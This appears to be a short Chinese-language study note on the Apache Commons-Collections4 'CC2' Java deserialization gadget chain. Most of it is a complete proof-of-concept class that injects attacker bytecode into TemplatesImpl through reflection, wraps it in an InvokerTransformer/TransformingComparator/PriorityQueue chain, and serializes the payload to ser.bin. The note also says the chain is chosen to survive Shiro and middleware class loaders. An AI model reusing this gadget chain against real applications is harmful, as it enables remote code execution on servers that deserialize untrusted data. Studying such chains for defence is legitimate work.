cc2和cc4很像,在TemplatesImpl
中的newTransformer()的
时候就会执行代码
那我们使用InvokerTransformer
调用templates
的newTransformer()
就可以了
我们只需将templates
将他传进去就可以了
CC2的特点是没有使用Transformer[]
,在shiro反序列化或者其他中间件的反序列化过称中,会重写一下类加载的方法,类加载的时候有时候会对数组处理不好,然后加载不到
这里直接写poc
package ysoserial.ay;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.xalan.xsltc.trax.TemplatesImpl;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
/**
* @ClassName TestCC2
* @Author aY
* @Date 2023/3/11 14:34
* @Description
*/
public class TestCC2 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();
Class te = templates.getClass();
Field namefield = te.getDeclaredField("_name");
namefield.setAccessible(true);
namefield.set(templates,"aaa");
Field bytecodesield = te.getDeclaredField("_bytecodes");
bytecodesield.setAccessible(true);
byte[] code= Files.readAllBytes(Paths.get("D://tmp/Test1.class"));
byte[][] codes={code};
bytecodesield.set(templates,codes);//到了代码执行的地方了,需要将执行的命令传进去
InvokerTransformer<Object, Object> InvokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});
TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
priorityQueue.add(templates);
priorityQueue.add(templates);
Class c = transformingComparator.getClass();
Field transformerfield = c.getDeclaredField("transformer");
transformerfield.setAccessible(true);
transformerfield.set(transformingComparator,InvokerTransformer);
serialize(priorityQueue);
unserialize("ser.bin");
}
//封装serialize
public static void serialize(Object object) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(object);
}
//封装unserialize
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}